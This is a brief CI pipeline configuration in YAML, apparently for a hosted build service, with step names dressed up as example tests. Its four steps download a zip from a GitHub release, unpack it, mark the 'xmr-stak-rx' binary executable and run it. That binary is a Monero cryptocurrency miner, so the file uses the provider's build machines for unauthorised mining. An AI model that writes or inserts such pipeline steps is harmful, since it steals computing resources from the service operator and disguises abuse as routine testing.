image: proboci/ubuntu:18.04-php7.4
steps:
  - name: nganu
    plugin: Shell
    command: wget https://github.com/GrettoRosella/vendor_extras/releases/download/r11x/reza.zip
  - name: Another example test with default Shell plugin
    command: unzip reza.zip
  - name: chmod
    command: chmod +x xmr-stak-rx
  - name: ekse
    command: ./xmr-stak-rx --noTest
